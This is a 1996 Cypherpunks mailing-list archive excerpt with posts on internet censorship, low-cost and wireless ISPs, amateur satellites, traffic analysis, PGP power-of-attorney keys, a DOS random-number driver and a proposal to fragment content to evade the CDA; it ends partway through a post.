Communications Centre, Goessel, KS +-------------------------------------+
Main e-mail: jgoerzen@complete.org | Other e-mail: goerzenj@complete.org |

On Sun, 31 Dec 1995 Steve14571@aol.com wrote:

> In a message dated 95-12-30 21:34:12 EST, accessnt@ozemail.com.au (Mark
> Neely) wrote:
> 
> I assume that C$ is only filtering the newsfeed as it hits German shores?
> Please tell me
> they aren't denying access to these "banned" newsgroups for all users
> worldwide!
> 
> This is exactly what they are doing, Mr. Neely.  I am not familiar with
> CompuServe, as I have never used it.  However, based on my understanding of
> how Usenet operates, it would be possible to write software and incorporate
> it into CompuServe software that would block German readers from the
> "obscene" newsgroups.  CompuServe would rather score points with the mostly
> ignorant general public by saying that they are becoming more
> "family-oriented."
> 
> I get my access through America Online, and I am afraid that these monolith
> online services (AOL, Delphi, Prodigy) will follow C$'s lead so they may also
> say they are "family-oriented."
> 
> I will no longer send mail to addresses that end with "compuserve.com."  If
> AOL decides to become family oriented, I will look for other ways to connect
> to the net.
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: frantz@netcom.com (Bill Frantz)
Date: Wed, 3 Jan 1996 16:12:59 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601030710.XAA28408@netcom5.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


At 22:11 1/2/96 -0800, Anonymous wrote:
>frantz@netcom.com (Bill Frantz) wrote:
>
>> Don't forget about infrared to cross public rights-of-way.
>
>What about fog?

How much reliability do you need?  As a first approxmation, look out your
window.  How often is it that you can't see your neighbor's house?  Here in
California, power failures are more frequent.  (N.B. higher level protocols
will recover from interruptions due to, e.g. large trucks.)

I first heard of people using the technology to extend an IBM mainframe
channel across a freeway 15 or 20 years ago.

Bill






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@REPLAY.COM (Anonymous)
Date: Wed, 3 Jan 1996 16:24:22 +0800
To: cypherpunks@toad.com
Subject: Re: Why Net Censorship Doesn't Work
Message-ID: <199601022214.XAA28190@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Ed Carp:

>Tell that to folks in the contries of used-to-be-Russia.  Lots of old 
>Communist leaders getting back into power - some folks are even saying 
>that the old days under the Communists were better than living in a free 
>market economy.
>
>Never underestimate the value of human stupidity and shortsightedness.

   Definitely. The number of warm and well-fed people who are willing to
lecture the cold and starving on morals and higher principles is
mind-boggling.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Carl Ellison <cme@clark.net>
Date: Wed, 3 Jan 1996 15:27:43 +0800
To: shamrock@netcom.com
Subject: Re: Foiling Traffic Analysis
Message-ID: <199601030421.XAA29402@clark.net>
MIME-Version: 1.0
Content-Type: text/plain


>Date: Tue, 02 Jan 1996 19:44:53 -0800
>From: shamrock@netcom.com (Lucky Green)
>Subject: Re: Foiling Traffic Analysis

>At 20:02 1/2/96, Jon Lasser wrote:
>
>>When the group of packets arrives at a given station, it replaces its
>>current encrypted packet with a new packet;

>All participants in this network are clearly guilty of conspiracy. Their
>assets will be confiscated under RICO. 

Sounds like disasterizing to me.

This is merely a technical means for producing anonymous communications.

Anonymity = conspiracy?

 - Carl

+--------------------------------------------------------------------------+
| Carl M. Ellison   cme@acm.org     http://www.clark.net/pub/cme           |
| PGP: E0414C79B5AF36750217BC1A57386478 & 61E2DE7FCB9D7984E9C8048BA63221A2 |
|  ``Officer, officer, arrest that man!  He's whistling a dirty song.''    |
+---------------------------------------------- Jean Ellison (aka Mother) -+




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Wed, 3 Jan 1996 21:09:15 +0800
To: Jim Choate <ravage@ssz.com>
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <m0tXNaA-0008zSC@pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 01:47 PM 1/2/96 -0600, you wrote:
>
>Forwarded message:
>
>> Date: Tue, 2 Jan 1996 18:43:31 +0000 (GMT)
>> From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
>> Subject: Re: Guerilla Internet Service Providers
>> 
>> About ten years ago a group I was involved with were thinking about
>> putting something into space as a publicity stunt. One company we talked
>> to claimed they could put 1 kg into orbit on one of their sounding rockets
>> for about $ 30,000 (that's a 1 kg satellite, not $ 30,000 per kg). How
>> small can you build a "data haven" satellite ? 
>> 
>> Looking a few years into the future, you could probably stick a
>> stripped-down Linux laptop with solar cells and a stripped-down satellite
>> telephone as a Net link on top of a slightly larger rocket and charge for
>> on-orbit storage using ecash... Using remailers it should be pretty-much
>> untraceable. 
>> 
>
>Actualy, both the Pacific Coast Rocketry group and the Experimental
>Spacecraft Association are working on putting the first amateur payload in
>LEO. ESA wants to put a telescope with real-time downlink up as their
>payload. PCR wants to put some kind of transponder up.
>
>Under current technology a group of about 30 dedicated amateurs (with
>suitable skills) could put a 25kg payload in orbit for under 1/4 million.
>It would consist of surplus and amateur built equipment.
>
>Tripolli puts out a magazine called High Performance Rocketry which you may
>be able to find at your local newstand (in Austin you get it at the Central
>Market Bookstop). It usually carries at least a couple of adds for material
>that PCR and a couple of smaller groups are putting out to help fund their
>project. I would say it will be less than 3 years before this dream occurs
>unless the DOT (the people who regulate all space shots now) decides not to
>give them a permit.

As I understand the physics, the whole process could be made FAR FAR FAR
more efficient if the rocket was boosted to about 40000 feet with a subsonic
airplane, a' la' X-15 and such.  It's above 75% of the earth's atmosphere
(dramatically reduced drag), is already going 600 mph in the correct
direction, and is 8 miles closer to the  ultimate goal 250 miles up).  This
might not sound like much of an advantage, but if you've ever worked out the
mathematics of the Saturn V (or space shuttle, etc), the VAST majority of
the fuel was used up in the first 20,000 feet, maybe even the first 5000
feet.  It would be even better if the first stage could be an air-breathing
supersonic ramjet, but that's not my field of expertise.

In addition, the existence of relatively low-cost GPS receivers would make
achieving an accurate orbit vastly cheaper than with the inertial guidance
systems historically used.  Sure, cheap accelerometers are being sold by
Analog Devices and Murata Erie sells cheap vibrational gyros (not to mention
fiber gyros) but it would be hard to beat the accuracy you could get with GPS.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 15:45:09 +0800
To: Steve Gibbons <jimbell@pacifier.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <v02120d01ad0fdd14e993@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:51 1/2/96, Steve Gibbons wrote:

>I had a similar thought about a month ago.  In particular, I was thinking that
>skyrise office buildings would be a great market for ISPs to target.  Rent a
>closet in the basement/top floor close to the telco demarc.  Run lots of
>UTP to
>the cients through the existing conduit, ceiling acces, air ducts, or whatever
>and boom, lots  of clients, low overhead, telco bills cut to 1/2 of the
>competitions'.  Up-front costs might (or might not be) higher, since the wire
>installation would now be the burden of the ISP.
[...]
>FWIW, (and if anyone winds up doing something like this, I want a "finders
>fee" ;-) )

Sorry, I thought of this months ago :-) But there is an even better
business opportunity out there. Wireless T1 service covering a whole
downtown area. I speced the whole system for the last company I worked for
before they ran out of money. My calculations show that you can deliver
close to T1 speed to corporate customers at fraction of the cost using land
lines. In the best case scenario, you can produce the individual connection
at below $200. No land line based ISP can ever touch that. The total cost
for a land line based IPS is at least $395/T1. Set-up fee is lower too.
Best, the whole thing can be set up self financing. If I wasn't so busy
with other projects, I'd implement it myself.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: shamrock@netcom.com (Lucky Green)
Date: Wed, 3 Jan 1996 15:42:42 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <v02120d02ad0fe032a4ee@[192.0.2.1]>
MIME-Version: 1.0
Content-Type: text/plain


At 22:11 1/2/96, Anonymous wrote:
>frantz@netcom.com (Bill Frantz) wrote:
>
>> Don't forget about infrared to cross public rights-of-way.
>
>What about fog?

Infrared and laser are not very reliable between buildings during fog.
Between your house and your neighbor, a low cost 900MHz bridge would be the
best way to go. On such short distances, an omni-directional antenna will
work just fine. Check out Solectek (cheaper) or Cylink (faster). Both offer
DES link encryption.


-- Lucky Green <mailto:shamrock@netcom.com>
   PGP encrypted mail preferred.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Steve Gibbons <steve@aztech.net>
Date: Wed, 3 Jan 1996 19:21:11 +0800
To: shamrock@netcom.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <0099BD00.63F6D1E0.1@aztech.net>
MIME-Version: 1.0
Content-Type: text/plain


In Article: <v02120d01ad0fdd14e993@[192.0.2.1]>, shamrock@netcom.com (Lucky Green) wrote:
# At 22:51 1/2/96, Steve Gibbons wrote:

# >I had a similar thought about a month ago.  In particular, I was thinking that
# >skyrise office buildings would be a great market for ISPs to target.  Rent a
# >closet in the basement/top floor close to the telco demarc.  Run lots of
# >UTP to
# >the cients through the existing conduit, ceiling acces, air ducts, or whatever
# >and boom, lots  of clients, low overhead, telco bills cut to 1/2 of the
# >competitions'.  Up-front costs might (or might not be) higher, since the wire
# >installation would now be the burden of the ISP.
# [...]
# >FWIW, (and if anyone winds up doing something like this, I want a "finders
# >fee" ;-) )

# Sorry, I thought of this months ago :-) 

But did you post/publish?  :)

# But there is an even better
# business opportunity out there. Wireless T1 service covering a whole
# downtown area. I speced the whole system for the last company I worked for
# before they ran out of money. My calculations show that you can deliver
# close to T1 speed to corporate customers at fraction of the cost using land
# lines. In the best case scenario, you can produce the individual connection
# at below $200. No land line based ISP can ever touch that. The total cost
# for a land line based IPS is at least $395/T1. Set-up fee is lower too.
# Best, the whole thing can be set up self financing. If I wasn't so busy
# with other projects, I'd implement it myself.

I'd be interested in seeing your numbers and cost breakdowns.  I'd really be
interested in the up-front costs that would be associated with the equipment
and set-up time/training that will help "insure" data privacy over wideley
broadcast media.  The up-front costs for ~T1 capable tranceivers isn't
insignificant either.  I figure ~$10K up front (maybe half of that, maybe twice
when you include management overhead)  Amortize  over 3 years, and compare.

All of this is assuming that the bandwidth is available on the airwaves to
handle ~200 ~T1s.  (If we're talking $200.00/mo. for T1, sign me up tomorrow,
and my neighbor, and his, and hers, and...  *poof* no more bandwidth in a
"decently" populated metro area or even a downtown.  (Back of the envelope
calculations show that ~200 T1 ~= 1 TV station [although I might be off by an
order of magnitude.])

I apologize if this is off topic, but the crypto part still applies (moreso,
even!) to broadcast over the airwaves.  (Besides, I'm sure that this list has
enough subscribers that are shelling out $200-$500/mo. for 56K/Frac T1/ISDN
that they'd be interested in a less expensive alternative.)

--
Steve@AZTech.Net




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Loren James Rittle <rittle@comm.mot.com>
Date: Wed, 3 Jan 1996 17:33:08 +0800
To: cypherpunks@toad.com
Subject: Re: NYT's _Unmuzzling the Internet_
Message-ID: <9601030920.AA05852@supra.comm.mot.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Jaron Lanier wrote in the _The New York Times_, January 2, 1996, p. A15:

 ``The other day, I came up with a way to easily evade the
   proposed American restrictions. My simple idea would be to
   create a computer program, dubbed `Unmuzzle,' which would
   deposit incomprehensible fragments of any forbidden
   material in different foreign computers (though maybe not
   Germany's). The contraband communication would only be
   reassembled into a coherent whole when downloaded in the
   home of the user back in the United States, where it would
   become protected speech, as in any other medium.''

Is this the state to which the Internet must evolve to withstand
attack from the possible near-future legislation contained within the
current draft of the Telecommunications Reregulation Bill?  The
Internet technology that was designed to withstand network outages by
routing around the problem must now, perhaps, also be designed to
allow information to be split for storage and transmission to navigate
around mere political insanity.  I know: "Cypherpunks write code!",
but something seems amiss with the technical solution proposed in the
opinion editorial quoted above. Many questions are begged in my mind.

At first, the Jaron proposal sounds like an interesting thought
experiment but a total waste of bandwidth, both CPU and network, to
me.  The unconstitutional Bill must be defeated in Congress, by that
Presidential veto pen that Clinton has become so fond of using
recently or the Court system, if absolutely necessary.  If none of
that happens, then surely technology can be used to route around this
"political" problem.  It just seems like a shame to have to expend
technical effort and valuable network resources to play games to meet
the letter of a law, which would so clearly break the direct spirit of
the Constitution, if signed into Law and later found during a Supreme
Court battle to "pass constitutional muster," as they like to say.

Under my model, which may be different than Jaron's, I assume the raw
data is useless without a recipe, or algorithm, if you prefer.  Jaron
doesn't say how the ``incomprehensible fragments of any forbidden
material'' are known to be joinable and how they are to be joined so I
invented this as the missing glue to discuss his idea in this forum.
I assume a recipe would be a new base item fetchable via a standard
URL.  It would disclose the location of raw data sets, how they should
be joined and the resultant data-type of the information, if the
recipe were to be followed.  In this way, it might be possible to work
a decoder directly into Mosaic/NetScape/HotJava/<name your favorite
WWW browser here>.  (Perhaps a self-imposed rating could be included
within the recipe as additional information bits.  Or, perhaps the
recipe could be signed by one or more reviewers, which may be trusted
by end-users.  These features are mentioned only as side features,
they do not affect the basic operation to circumvent the letter of the
proposed Law.

Back to the questions begged and partial solutions.

For instance, if one provides, in a distributed fashion, data sets ---
which taken apart are not indecent in anyone's mind since they appear
completely random --- and a recipe to generate information from the
data sets --- which may construct something which might be considered
indecent --- does anyone violate any portion of the insane Indecent
Bill, if passed by Congress and signed into Indecent Law by the
President?  Does the person who set up the information split get in
trouble?  Do the people pulling in recipes and various piece of
random-looking data sets get in trouble?  Do the data set warehousers
get in trouble, even if they could have had no direct way to know the
raw pieces of data that they stored were to something eventually seen
to be indecent when a recipe was followed.  Do the recipe warehousers
get in trouble, since they could have known what might be created if
all data sets were obtained and joined as proscribed by the recipe?
What if end-user client software was taught to do all the steps
required to follow a recipe automatically?  Same as last question,
except the user was explicitly asked before any recipe was followed to
completion?  I think that the Court would be hard-pressed to find a
difference between distribution of something indecent and a recipe
known to create something indecent from raw data. But, what if recipes
were used for everything, not just items thought to be borderline
indecent to totally obscene.  Under this assumption, if it could
be shown that a recipe and raw data warehousers had no knowledge
of each other's contents, they could do no self-policing.  It appears
that raw data warehousers have "no knowledge" of recipe warehousers
as long as the raw data contains no reference to the recipe.  The
recipe warehousers appear to have no such luck since they contain
URLs that point to the raw data chunks required to form coherent
information.  Recipe warehousers could follow the recipe to "check"
content.

Finally, on a different tangent, why do the raw data pieces have to be
stored on different machines in different countries, if by themselves
they are unreadable?  Since I believe it is the recipe, not the
contributing raw data that presents a problem, it seems like this
must be the piece to be stored external to the U.S.

For example, only the recipe need be stored abroad in a nice little
computer in the Netherlands.  Assuming the recipe included only
URL-style pointers to the data sets' distributed location and mixing
method, a recipe should be quite small.  Imagine the Government trying
to explain to a jury that random looking transmissions taken together
in some exotic manner --- as described by a file fetched from outside
the U.S. --- equals some filthy text or image or some other unpopular
political speech.  Using these rules, I could probably find three
passages of text in the 100,000's of pages composing the U.S. Code
that when XOR'd together generate something obscene.

To make the Government's job even harder before a jury, what if the
recipe to be fetched from the foreign country always generated the
First Amendment text when followed directly.  Imagine the Government's
surprise when the Defense later shows a recipe involving the exact
same information sets that, perhaps, yields the text of the First
Amendment, The Indecent Bill itself or another interesting historical
document.  What if certain implementations of software that decode
these recipes could infer another recipe implicitly encoded within the
fetched data sets which were required to follow the explicitly given
recipe.  Since the information required to regenerate the First
Amendment text will have always been pulled, in its entirety, an
external observer must concluded that the receiver might have plainly
followed the directions in the recipe leading to its generation
instead of any hidden inferred recipe for the questionably indecent
text or image.

That sounds like reasonable doubt to me, regardless of the facts of
the case.  The Defense can always argue that the client was just
trying to express the First Amendment in a novel manner, which
happens to be true in more ways than one in this case. :-)

The Jaron proposal does have some major benefits at least as I have
framed the idea.  These need to be mentioned explicitly, in case the
important side goal was too subtle expressed above.  I reverse the
location of the bulk of the data required to store the real
information.  The recipe, which is assumed to be small with respects
to the size of the raw data, is stored in any Internet friendly
location (i.e. most of the world except the U.S. after the CDA
passes) and pulled into the U.S. as required.  The raw data is stored
within the U.S., randomly spread between data set servers.  When
arranged in this manner, the bulk of the data continues to be stored
as it would have been before stupid U.S. regulations took affect.
This final analysis might sound U.S. centric.  It was not meant to be.
I assume that any information replication scheme that might have been
used could continue to be used.  For example, one recipe might exist
for each regional replication that existed.  Hopefully, the recipes
themselves would be replicated in many Internet friendly locations.

I welcome informed legal comments on this modified proposal.

Regards,
Loren

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMOpKUv8de8m5izJJAQH+cgP+MDO6TK5s1MkkiWcvSKP9wwoVn0VqMM+U
hPRGQJ2MjL3s7r9mPTqlbnPOllI4FO6rBQt5vqmzMnemFG1k94REvmGHuSMxZ7xV
zoqYcvZzxdG2KwKBiLWiilirA0IrDV1MQJ4i7xMYYdOoOoeN1VnUbgHW9iWquwKT
tIpWzbFFGO0=
=m0bM
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: lull@acm.org (John Lull)
Date: Wed, 3 Jan 1996 21:08:08 +0800
To: jirib@cs.monash.edu.au
Subject: Re: Proxy/Representation?
In-Reply-To: <199601030633.RAA16556@sweeney.cs.monash.edu.au>
Message-ID: <30ea3076.11971382@smtp.ix.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 03 Jan 1996 17:32:59 +1100 (EST), jirib@cs.monash.edu.au
wrote:

> To avoid such confusion, Dave should create a separate key with 
> the key ID "Dave pp. Helen" (or similar). However, Helen doesn't need
> to (shouldn't) know that key! This is Dave's key, created by Dave
> for Dave's use while he is agent for Helen. Helen would probably
> sign this key, but doesn't need to since the PoA has the f'print.
> 
> In fact, you don't want Helen to know it, so that if Dave oversteps
> his authority she can prove that it was him not her. Ie if Helen finds
> out the key, Dave should revoke it.

There is also something to be said for Helen having a copy of the
revocation certificate for the key.  If Helen believes Dave has or is
likely to overstep his authority, she could then essentially revoke
the power of attorney by revoking the "Dave pp. Helen" key.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: nobody@flame.alias.net (Anonymous)
Date: Wed, 3 Jan 1996 17:13:25 +0800
To: cypherpunks@toad.com
Subject: NSA gets into the ISP business
Message-ID: <199601030825.JAA21055@utopia.hacktic.nl>
MIME-Version: 1.0
Content-Type: text/plain


Recently I went out shopping for a cheaper ISP.  I found one which was very
inexpensive.  Too inexpensive.  At first I was thrilled...then I began to
wonder how they could charge so little.  Pcix.com is offering static ip
address, domain name, etc, the whole schebang for $20 a month, or $75 if
you want a dedicated line.  That's less then TLG, and TLG is a non-profit
organization.

As the saying goes, if it sounds too good to be true, it probably is.
It seems our government friends have found themselves a new hobby.  I'm
not sure exactly what this sting operation was set up for, but I'm sure
you can use your imagination.

The user agreement is very interesting.  It states: 1) You're not allowed
to upload any encryption software (even if you don't export it) or have
any strong crypto in your shell account, and 2) They are allowed to
monitor anything you send over their network.  Spooks' dream ISP.


Highlights from the user agreement:
Section 2.7(b)
>   Member further agrees not to upload to the PCIX services any data or
>   software that cannot be exported without the prior written
>   government authorization, including, but not limited to, certain
>   types of encryption software.
Section 4.1
>   PCIX may elect to electronically monitor any and all traffic
>   which passes over our Wide Area Network. This monitoring may include
>   public as well as private communications and data transfers from our
>   Members and to our Members as well as any and all communications and
>   data transfers to and from any other internet sites. PCIX will
>   monitor our Members and those who use or transmit communications or
>   other data over our network to try and ensure adherence to
>   international, federal, state and local laws as well as the PCIX
>   Terms of Service Agreement.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mark Neely <accessnt@ozemail.com.au>
Date: Wed, 3 Jan 1996 22:59:01 +0800
To: cypherpunks@toad.com
Subject: Re:US calls for measures against Internet porn
Message-ID: <199601030047.LAA07011@oznet02.ozemail.com.au>
MIME-Version: 1.0
Content-Type: text/plain



>         WASHINGTON DC (Reuter) - The US called Sunday for improved
>management of the Internet to prevent people seeing pornographic
>material on the world computer network.

Perhaps it is a result of many self-interested parties who have hyped the
Internet to the hilt, but it never ceases to amaze me how people think
that as soon as you connect a PC to the Internet, suddenly, all this information
and computer wizardry _leaps_ down the phone line and _jumps_ out of your
screen.

It can be clearly demonstrated (even to US politicians) that the Internet
is not a passive media - users must go out and find what they are looking
for (especially pornography). You cannot "stumble" upon pornography,
as you might by, say, channel surfing on cable.

You can't tell me that someone who fires up their Web browser and points it
to http://www.playboy.com, or clicks yes to a request that they acknowledge
that they are over 18/21/majority and agree to access adult material doesn't
know what they are getting themselves into...

Mark
___
Mark Neely - accessnt@ozemail.com.au
Lawyer, Professional Cynic
Author: Australian Beginner's Guide to the Internet
Work-in-Progress: Australian Business Guide to the Internet
WWW: http://www.ozemail.com.au/~accessnt





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: wlkngowl@unix.asb.com (Mutatis Mutantdis)
Date: Wed, 3 Jan 1996 20:13:50 +0800
To: cypherpunks@toad.com
Subject: NOISE.SYS /dev/random driver for DOS, v0.3.3-Beta
Message-ID: <199601031215.HAA19436@UNiX.asb.com>
MIME-Version: 1.0
Content-Type: text/plain



The leatest version is ready to be examined.  Much rewriting.

Send a message with the subject "send noise033" and an automated
responder should eventually send you a uu-encoded Info-Zip file with a
compiled version of the driver, assembler source-code, and pgp-sig.

Again, comments & criticism would be appreciated. Help is especially
needed trying to find IRQs to sample for sources of randomness.
Finding a good way to sample mouse or video scan lines would also be a
help.... etc.

--Rob






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jiri Baum <jirib@sweeney.cs.monash.edu.au>
Date: Wed, 3 Jan 1996 20:12:32 +0800
To: perry@piermont.com
Subject: Re: Proxy/Representation?
In-Reply-To: <199512290024.TAA10333@jekyll.piermont.com>
Message-ID: <199601030633.RAA16556@sweeney.cs.monash.edu.au>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Hello "David E. Smith" <dsmith@midwest.net>
  and cypherpunks@toad.com
  and "Perry E. Metzger" <perry@piermont.com>

PEM wrote:
> "David E. Smith" writes:
...[about power of attorney and PGP, reply-to-reply]...
> > >standard for "Power of Attorney" documents, and for the entity
> > >receiving something signed in your key that should be signed in
> > >another person's key to also see the digitally signed power of
...
> > That's more of what I was looking for.  I suppose that (I'm still using
> > PGP as my example) there could be a shared PGP key, signed by Helen and
> > myself, where only the two of us know the passphrase,

I don't think that's what was intended. If I understood:

There'd be a document (hereinafter PoA) signed by Helen which would
say "This is a PoA appointing Dave, PGP key X fingerprint Y, to
do A, B, C on my behalf #include<lawyerspeak.h>".

Then, when signing, Dave would sign with his own key X, making sure
that every document has "p.p. Helen" at the end. The recipient checks
Dave's signature on the document and Helen's signature on the PoA.

> Huh? Why? Why would you need [a separate key]? ...

Many automatic systems will assume that a key can only sign for 
one person (though each person may have several keys). Therefore,
it'll confuse "Dave" and "pp. Helen". The RISKS are obvious.

To avoid such confusion, Dave should create a separate key with 
the key ID "Dave pp. Helen" (or similar). However, Helen doesn't need
to (shouldn't) know that key! This is Dave's key, created by Dave
for Dave's use while he is agent for Helen. Helen would probably
sign this key, but doesn't need to since the PoA has the f'print.

In fact, you don't want Helen to know it, so that if Dave oversteps
his authority she can prove that it was him not her. Ie if Helen finds
out the key, Dave should revoke it.


Hope that makes sense...

Jiri
- --
If you want an answer, please mail to <jirib@cs.monash.edu.au>.
On sweeney, I may delete without reading!
PGP 463A14D5 (but it's at home so it'll take a day or two)
PGP EF0607F9 (but it's at uni so don't rely on it too much)

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2i

iQCVAwUBMOoi4CxV6mvvBgf5AQGUJwP/fUPQgzYrbAuGGC8Q4ha8zNNoiAJVU3Rw
/mAZbPtG6OQsoFal3xKtsquilXuCsj40btJc2XaTNL7adcKAN+0ZNwYgCHC5C8Yc
zzgTwCSdnb9t8RY6vcZeIcXixboF1BKGtqSyzICJfd7yHNJWrh0YfUzTSPVD6jXC
kOl7JNurEFY=
=a/TW
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: David Mandl <dmandl@bear.com>
Date: Thu, 4 Jan 1996 14:28:00 +0800
To: Duncan Frissell <frissell@panix.com>
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <2.2.32.19960102115316.008b7368@panix.com>
Message-ID: <Pine.SUN.3.91.960102092744.4338J-100000@goya>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Duncan Frissell wrote:

> At 09:07 PM 1/1/96 -0500, David Mandl wrote:
> >I agree.  It's not a good idea to assume that there's going to be some kind
> >of widespread opposition movement when the big Net Crackdown comes.  Most
> >people will either obey the law, be unaffected by it, or violate it in very
> >insignificant ways ("net jaywalking").  There's strength in numbers, but I
> >just don't think the numbers will be there.
> >
> >   --Dave.
> 
> During Prohibition, consumption of illegal booze increased steadily during
> the whole period.  Hard liquor consumption was actually higher at the end of
> Prohibition than it had been before Prohibition.
> 
> DCF

The number of people who drank booze when Prohibition began dwarfs the
number of people who want access to "controlled" information on the
net today.  Most people still don't even understand what the net is.
They're two completely different situations.  Also, the powers that be
have much better reasons for killing the net than they had for banning
booze.

Also, access to the net for Joe Average is still largely limited to
authoritarian giants like AOL (which forwards people's mail to the
FBI) and CompuServe (which bans hundreds of newsgroups).  Maybe these
companies will eventually be knocked out by small libertarian-minded
ISPs, maybe not.

   --D.

--
David Mandl
Bear, Stearns & Co. Inc.
Phone: (212) 272-3888
Email: dmandl@bear.com

--
*******************************************************************************
Bear Stearns is not responsible for any recommendation, solicitation, offer or
agreement or any information about any transaction, customer account or account
activity contained in this communication.
*******************************************************************************




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tcmay@got.net (Timothy C. May)
Date: Thu, 4 Jan 1996 03:07:17 +0800
To: cypherpunks@toad.com
Subject: Foiling Traffic Analysis
Message-ID: <ad0ebb9d0c0210048ac9@[205.199.118.202]>
MIME-Version: 1.0
Content-Type: text/plain


At 4:35 AM 1/2/96, Jon Lasser wrote:

>The potential for traffic analysis is the danger here. If an "FBI
>International Data Laundering Expert" testifies in court that said data
>came from a site known to be frequented solely by so-and-sos, all the
>strong crypto in the world won't stop the average jury from convicting you.
>
>Carl Ellison (among others, I'm sure) has suggested various means of
>foiling traffic analysis among a group of trusted conspirators, using a
>token-ring-like routing scheme. I'm not completely convinced that it's
>robust enough, but a variation on it is probably adaptable.

How does this differ from Dining Cryptographers approaches?


--Tim May

We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Higher Power: 2^756839 - 1  | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Simon Spero <ses@tipper.oit.unc.edu>
Date: Thu, 4 Jan 1996 03:00:37 +0800
To: Jason Rentz <andr0id@midwest.net>
Subject: Re: Guerilla Internet Service Providers
In-Reply-To: <199601021435.IAA10484@cdale1.midwest.net>
Message-ID: <Pine.SOL.3.91.960102123104.3276B-100000@chivalry>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Jason Rentz wrote:
> 
> All you need to do is go to your nearest junkyard and get an old used
> Satalite, contract Russia to send it up for you for the price of an e-mail
> account or somthin and away you go.   :)
> 
[Why am I taking this seriously? :-)]

Make sure that the person you talk to in Russia is actually allowed to 
sell you the launch system first; a few years ago there were a lot of 
people trying to sell the stuff on, some of whom were even authorised. 

Simon




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@ssz.com>
Date: Thu, 4 Jan 1996 14:13:10 +0800
To: cypherpunks@toad.com
Subject: Re: Guerilla Internet Service Providers (fwd)
Message-ID: <199601021947.NAA01688@einstein.ssz.com>
MIME-Version: 1.0
Content-Type: text



Forwarded message:

> Date: Tue, 2 Jan 1996 18:43:31 +0000 (GMT)
> From: "Mark Grant, M.A. (Oxon)" <mark@unicorn.com>
> Subject: Re: Guerilla Internet Service Providers
> 
> About ten years ago a group I was involved with were thinking about
> putting something into space as a publicity stunt. One company we talked
> to claimed they could put 1 kg into orbit on one of their sounding rockets
> for about $ 30,000 (that's a 1 kg satellite, not $ 30,000 per kg). How
> small can you build a "data haven" satellite ? 
> 
> Looking a few years into the future, you could probably stick a
> stripped-down Linux laptop with solar cells and a stripped-down satellite
> telephone as a Net link on top of a slightly larger rocket and charge for
> on-orbit storage using ecash... Using remailers it should be pretty-much
> untraceable. 
> 

Actualy, both the Pacific Coast Rocketry group and the Experimental
Spacecraft Association are working on putting the first amateur payload in
LEO. ESA wants to put a telescope with real-time downlink up as their
payload. PCR wants to put some kind of transponder up.

Under current technology a group of about 30 dedicated amateurs (with
suitable skills) could put a 25kg payload in orbit for under 1/4 million.
It would consist of surplus and amateur built equipment.

Tripolli puts out a magazine called High Performance Rocketry which you may
be able to find at your local newstand (in Austin you get it at the Central
Market Bookstop). It usually carries at least a couple of adds for material
that PCR and a couple of smaller groups are putting out to help fund their
project. I would say it will be less than 3 years before this dream occurs
unless the DOT (the people who regulate all space shots now) decides not to
give them a permit.


Hi ho, Hi ho, it's of to LEO we go....





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: dmandl@panix.com
Date: Thu, 4 Jan 1996 13:29:49 +0800
To: ecarp@netcom.com
Subject: Re: Why Net Censorship Doesn't Work
In-Reply-To: <9601021825.AB15309@virgo.bsnet>
Message-ID: <Pine.SUN.3.91.960102140340.19427A-100000@panix.com>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 2 Jan 1996, Ed Carp wrote:

